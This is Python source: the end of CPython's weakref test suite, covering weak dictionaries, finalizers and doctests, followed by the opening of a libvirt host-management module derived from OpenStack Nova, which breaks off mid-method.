except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
            # Since the underlying dict is ordered, the first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_valued_union_operators(self):
a = C()
b = C()
c = C()
wvd1 = weakref.WeakValueDictionary({1: a})
wvd2 = weakref.WeakValueDictionary({1: b, 2: a})
wvd3 = wvd1.copy()
d1 = {1: c, 3: b}
pairs = [(5, c), (6, b)]
tmp1 = wvd1 | wvd2 # Between two WeakValueDictionaries
self.assertEqual(dict(tmp1), dict(wvd1) | dict(wvd2))
self.assertIs(type(tmp1), weakref.WeakValueDictionary)
wvd1 |= wvd2
self.assertEqual(wvd1, tmp1)
tmp2 = wvd2 | d1 # Between WeakValueDictionary and mapping
self.assertEqual(dict(tmp2), dict(wvd2) | d1)
self.assertIs(type(tmp2), weakref.WeakValueDictionary)
wvd2 |= d1
self.assertEqual(wvd2, tmp2)
tmp3 = wvd3.copy() # Between WeakValueDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wvd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakValueDictionary)
tmp4 = d1 | wvd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wvd3))
self.assertIs(type(tmp4), weakref.WeakValueDictionary)
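        # Dropping the last strong reference to `a` should immediately purge every
        # entry that held `a` as a value (CPython removes it via refcounting, so no
        # explicit gc.collect() is needed before the assertions below).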
del a
self.assertNotIn(2, tmp1)
self.assertNotIn(2, tmp2)
self.assertNotIn(1, tmp3)
self.assertNotIn(1, tmp4)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from networking_fortinet.virt import event as virtevent
from networking_fortinet.virt.libvirt import config as vconfig
from networking_fortinet.virt.libvirt import guest as libvirt_guest
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("queue" if six.PY3 else "Queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
self.comp_cache = kwargs.get("compression_cache", 0)
self.comp_bytes = kwargs.get("compression_bytes", 0)
self.comp_pages = kwargs.get("compression_pages", 0)
self.comp_cache_misses = kwargs.get("compression_cache_misses", 0)
self.comp_overflow = kwargs.get("compression_overflow", 0)
@classmethod
def _get_job_stats_compat(cls, dom):
# Make the old virDomainGetJobInfo method look similar to the
# modern virDomainGetJobStats method
try:
info = dom.jobInfo()
except libvirt.libvirtError as ex:
# When migration of a transient guest completes, the guest
# goes away so we'll see NO_DOMAIN error code
#
# When migration of a persistent guest completes, the guest
# merely shuts off, but libvirt unhelpfully raises an
# OPERATION_INVALID error code
#
